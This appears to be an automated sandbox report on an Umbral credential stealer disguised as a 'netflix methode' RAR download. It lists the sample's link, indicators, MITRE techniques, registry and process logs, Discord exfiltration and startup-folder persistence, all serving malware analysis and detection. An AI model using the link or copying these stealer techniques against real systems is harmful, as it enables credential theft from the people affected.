umbral | hxxps://www[.]mediafire[.]com/file/8v0ym9nvwrkeusj/netflix+methode+[.]rar/file

Resubmissions

14-09-2024 19:20

240914-x2klna1dpn 10

14-09-2024 19:17

240914-xzvnva1cpl 4

14-09-2024 19:14

240914-xxtnrs1bmn 4

14-09-2024 19:10

240914-xvkcba1brg 4

Analysis

max time kernel
278s
max time network
280s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
14-09-2024 19:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://www.mediafire.com/file/8v0ym9nvwrkeusj/netflix+methode+.rar/file

Score

10^/10

umbral credential_access discovery execution persistence privilege_escalation spyware stealer

Malware Config

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral1/files/0x00070000000235d5-688.dat	family_umbral
behavioral1/memory/1120-740-0x000001903FCF0000-0x000001903FD36000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3684	powershell.exe
2812	powershell.exe
5516	powershell.exe
5636	powershell.exe
2156	powershell.exe
4572	powershell.exe
4160	powershell.exe
4328	powershell.exe
3768	powershell.exe
708	powershell.exe
5160	powershell.exe
5496	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 3 IoCs

pid	Process
1120	setup.exe
1652	setup.exe
1612	setup.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
306	discord.com
307	discord.com
312	discord.com
315	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
303	ip-api.com

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Event Triggered Execution: Accessibility Features 1 TTPs
Windows contains accessibility features that may be used by adversaries to establish persistence and/or elevate privileges.
persistence privilege_escalation

Accessibility Features
T1546.008

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4584	wmic.exe
5744	wmic.exe
5220	wmic.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies registry class 57 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = ffffffff	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByDirection = "1"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\IconSize = "48"	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295"	msedge.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1194130065-3471212556-1656947724-1000\{BE8774E3-D891-40C7-9440-9E945687431C}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\LogicalViewMode = "3"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1"	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000001000000ffffffff	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\NodeSlot = "2"	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Downloads"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616193"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e8005398e082303024b98265d99428e115f0000	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 3a001f44471a0359723fa74489c55595fe6b30ee260001002600efbe10000000b98ea471d7e4da019befacf9e2e4da01290c33a4db06db0114000000	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:PID = "0"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupView = "0"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Mode = "1"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1092616193"	msedge.exe

NTFS ADS 6 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\accounts (1).txt:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 137804.crdownload:SmartScreen	msedge.exe
File created	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\miVQ8.scr\:SmartScreen:$DATA	setup.exe
File created	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uLl8m.scr\:SmartScreen:$DATA	setup.exe
File created	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\bkDFL.scr\:SmartScreen:$DATA	setup.exe
File opened for modification	C:\Users\Admin\Downloads\accounts .txt:Zone.Identifier	msedge.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2196	msedge.exe
2196	msedge.exe
3976	msedge.exe
3976	msedge.exe
3600	identity_helper.exe
3600	identity_helper.exe
5776	msedge.exe
5776	msedge.exe
4048	msedge.exe
4048	msedge.exe
4048	msedge.exe
4048	msedge.exe
6032	msedge.exe
6032	msedge.exe
4440	msedge.exe
4440	msedge.exe
2244	msedge.exe
2244	msedge.exe
5676	msedge.exe
5676	msedge.exe
4084	msedge.exe
4084	msedge.exe
708	powershell.exe
708	powershell.exe
708	powershell.exe
5516	powershell.exe
5516	powershell.exe
5516	powershell.exe
3768	powershell.exe
3768	powershell.exe
3768	powershell.exe
1436	powershell.exe
1436	powershell.exe
1436	powershell.exe
5636	powershell.exe
5636	powershell.exe
5636	powershell.exe
5160	powershell.exe
5160	powershell.exe
5160	powershell.exe
3684	powershell.exe
3684	powershell.exe
3684	powershell.exe
2156	powershell.exe
2156	powershell.exe
2156	powershell.exe
3916	powershell.exe
3916	powershell.exe
3916	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
5496	powershell.exe
5496	powershell.exe
5496	powershell.exe
4160	powershell.exe
4160	powershell.exe
4160	powershell.exe
2812	powershell.exe
2812	powershell.exe
2812	powershell.exe
920	powershell.exe
920	powershell.exe
920	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
4696	osk.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 23 IoCs

pid	Process
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: 33	2904	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2904	AUDIODG.EXE
Token: SeDebugPrivilege	1120	setup.exe
Token: SeDebugPrivilege	708	powershell.exe
Token: SeDebugPrivilege	5516	powershell.exe
Token: SeDebugPrivilege	3768	powershell.exe
Token: SeDebugPrivilege	1436	powershell.exe
Token: SeIncreaseQuotaPrivilege	2280	wmic.exe
Token: SeSecurityPrivilege	2280	wmic.exe
Token: SeTakeOwnershipPrivilege	2280	wmic.exe
Token: SeLoadDriverPrivilege	2280	wmic.exe
Token: SeSystemProfilePrivilege	2280	wmic.exe
Token: SeSystemtimePrivilege	2280	wmic.exe
Token: SeProfSingleProcessPrivilege	2280	wmic.exe
Token: SeIncBasePriorityPrivilege	2280	wmic.exe
Token: SeCreatePagefilePrivilege	2280	wmic.exe
Token: SeBackupPrivilege	2280	wmic.exe
Token: SeRestorePrivilege	2280	wmic.exe
Token: SeShutdownPrivilege	2280	wmic.exe
Token: SeDebugPrivilege	2280	wmic.exe
Token: SeSystemEnvironmentPrivilege	2280	wmic.exe
Token: SeRemoteShutdownPrivilege	2280	wmic.exe
Token: SeUndockPrivilege	2280	wmic.exe
Token: SeManageVolumePrivilege	2280	wmic.exe
Token: 33	2280	wmic.exe
Token: 34	2280	wmic.exe
Token: 35	2280	wmic.exe
Token: 36	2280	wmic.exe
Token: SeIncreaseQuotaPrivilege	2280	wmic.exe
Token: SeSecurityPrivilege	2280	wmic.exe
Token: SeTakeOwnershipPrivilege	2280	wmic.exe
Token: SeLoadDriverPrivilege	2280	wmic.exe
Token: SeSystemProfilePrivilege	2280	wmic.exe
Token: SeSystemtimePrivilege	2280	wmic.exe
Token: SeProfSingleProcessPrivilege	2280	wmic.exe
Token: SeIncBasePriorityPrivilege	2280	wmic.exe
Token: SeCreatePagefilePrivilege	2280	wmic.exe
Token: SeBackupPrivilege	2280	wmic.exe
Token: SeRestorePrivilege	2280	wmic.exe
Token: SeShutdownPrivilege	2280	wmic.exe
Token: SeDebugPrivilege	2280	wmic.exe
Token: SeSystemEnvironmentPrivilege	2280	wmic.exe
Token: SeRemoteShutdownPrivilege	2280	wmic.exe
Token: SeUndockPrivilege	2280	wmic.exe
Token: SeManageVolumePrivilege	2280	wmic.exe
Token: 33	2280	wmic.exe
Token: 34	2280	wmic.exe
Token: 35	2280	wmic.exe
Token: 36	2280	wmic.exe
Token: SeIncreaseQuotaPrivilege	1464	wmic.exe
Token: SeSecurityPrivilege	1464	wmic.exe
Token: SeTakeOwnershipPrivilege	1464	wmic.exe
Token: SeLoadDriverPrivilege	1464	wmic.exe
Token: SeSystemProfilePrivilege	1464	wmic.exe
Token: SeSystemtimePrivilege	1464	wmic.exe
Token: SeProfSingleProcessPrivilege	1464	wmic.exe
Token: SeIncBasePriorityPrivilege	1464	wmic.exe
Token: SeCreatePagefilePrivilege	1464	wmic.exe
Token: SeBackupPrivilege	1464	wmic.exe
Token: SeRestorePrivilege	1464	wmic.exe
Token: SeShutdownPrivilege	1464	wmic.exe
Token: SeDebugPrivilege	1464	wmic.exe
Token: SeSystemEnvironmentPrivilege	1464	wmic.exe
Token: SeRemoteShutdownPrivilege	1464	wmic.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe

Suspicious use of SendNotifyMessage 55 IoCs

pid	Process
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
4748	taskmgr.exe
4748	taskmgr.exe
4748	taskmgr.exe
4748	taskmgr.exe
4748	taskmgr.exe
4748	taskmgr.exe
4748	taskmgr.exe
4748	taskmgr.exe
4748	taskmgr.exe
4748	taskmgr.exe
4748	taskmgr.exe
4748	taskmgr.exe
4748	taskmgr.exe
4748	taskmgr.exe
4748	taskmgr.exe
4748	taskmgr.exe
4748	taskmgr.exe
4748	taskmgr.exe
4748	taskmgr.exe
4748	taskmgr.exe
4748	taskmgr.exe
4748	taskmgr.exe
4748	taskmgr.exe
4748	taskmgr.exe
4748	taskmgr.exe
4748	taskmgr.exe
4748	taskmgr.exe
4748	taskmgr.exe
4748	taskmgr.exe
4748	taskmgr.exe
4748	taskmgr.exe

Suspicious use of SetWindowsHookEx 25 IoCs

pid	Process
4696	osk.exe
4696	osk.exe
4696	osk.exe
4696	osk.exe
4440	msedge.exe
4696	osk.exe
4696	osk.exe
4696	osk.exe
4696	osk.exe
4696	osk.exe
4696	osk.exe
4696	osk.exe
4696	osk.exe
4696	osk.exe
4696	osk.exe
4696	osk.exe
4696	osk.exe
4696	osk.exe
4696	osk.exe
4696	osk.exe
4696	osk.exe
4696	osk.exe
4696	osk.exe
4696	osk.exe
4696	osk.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3976 wrote to memory of 2276	3976	msedge.exe	82
PID 3976 wrote to memory of 2276	3976	msedge.exe	82
PID 3976 wrote to memory of 2188	3976	msedge.exe	83
PID 3976 wrote to memory of 2188	3976	msedge.exe	83
PID 3976 wrote to memory of 2188	3976	msedge.exe	83
PID 3976 wrote to memory of 2188	3976	msedge.exe	83
PID 3976 wrote to memory of 2188	3976	msedge.exe	83
PID 3976 wrote to memory of 2188	3976	msedge.exe	83
PID 3976 wrote to memory of 2188	3976	msedge.exe	83
PID 3976 wrote to memory of 2188	3976	msedge.exe	83
PID 3976 wrote to memory of 2188	3976	msedge.exe	83
PID 3976 wrote to memory of 2188	3976	msedge.exe	83
PID 3976 wrote to memory of 2188	3976	msedge.exe	83
PID 3976 wrote to memory of 2188	3976	msedge.exe	83
PID 3976 wrote to memory of 2188	3976	msedge.exe	83
PID 3976 wrote to memory of 2188	3976	msedge.exe	83
PID 3976 wrote to memory of 2188	3976	msedge.exe	83
PID 3976 wrote to memory of 2188	3976	msedge.exe	83
PID 3976 wrote to memory of 2188	3976	msedge.exe	83
PID 3976 wrote to memory of 2188	3976	msedge.exe	83
PID 3976 wrote to memory of 2188	3976	msedge.exe	83
PID 3976 wrote to memory of 2188	3976	msedge.exe	83
PID 3976 wrote to memory of 2188	3976	msedge.exe	83
PID 3976 wrote to memory of 2188	3976	msedge.exe	83
PID 3976 wrote to memory of 2188	3976	msedge.exe	83
PID 3976 wrote to memory of 2188	3976	msedge.exe	83
PID 3976 wrote to memory of 2188	3976	msedge.exe	83
PID 3976 wrote to memory of 2188	3976	msedge.exe	83
PID 3976 wrote to memory of 2188	3976	msedge.exe	83
PID 3976 wrote to memory of 2188	3976	msedge.exe	83
PID 3976 wrote to memory of 2188	3976	msedge.exe	83
PID 3976 wrote to memory of 2188	3976	msedge.exe	83
PID 3976 wrote to memory of 2188	3976	msedge.exe	83
PID 3976 wrote to memory of 2188	3976	msedge.exe	83
PID 3976 wrote to memory of 2188	3976	msedge.exe	83
PID 3976 wrote to memory of 2188	3976	msedge.exe	83
PID 3976 wrote to memory of 2188	3976	msedge.exe	83
PID 3976 wrote to memory of 2188	3976	msedge.exe	83
PID 3976 wrote to memory of 2188	3976	msedge.exe	83
PID 3976 wrote to memory of 2188	3976	msedge.exe	83
PID 3976 wrote to memory of 2188	3976	msedge.exe	83
PID 3976 wrote to memory of 2188	3976	msedge.exe	83
PID 3976 wrote to memory of 2196	3976	msedge.exe	84
PID 3976 wrote to memory of 2196	3976	msedge.exe	84
PID 3976 wrote to memory of 964	3976	msedge.exe	85
PID 3976 wrote to memory of 964	3976	msedge.exe	85
PID 3976 wrote to memory of 964	3976	msedge.exe	85
PID 3976 wrote to memory of 964	3976	msedge.exe	85
PID 3976 wrote to memory of 964	3976	msedge.exe	85
PID 3976 wrote to memory of 964	3976	msedge.exe	85
PID 3976 wrote to memory of 964	3976	msedge.exe	85
PID 3976 wrote to memory of 964	3976	msedge.exe	85
PID 3976 wrote to memory of 964	3976	msedge.exe	85
PID 3976 wrote to memory of 964	3976	msedge.exe	85
PID 3976 wrote to memory of 964	3976	msedge.exe	85
PID 3976 wrote to memory of 964	3976	msedge.exe	85
PID 3976 wrote to memory of 964	3976	msedge.exe	85
PID 3976 wrote to memory of 964	3976	msedge.exe	85
PID 3976 wrote to memory of 964	3976	msedge.exe	85
PID 3976 wrote to memory of 964	3976	msedge.exe	85
PID 3976 wrote to memory of 964	3976	msedge.exe	85
PID 3976 wrote to memory of 964	3976	msedge.exe	85
PID 3976 wrote to memory of 964	3976	msedge.exe	85
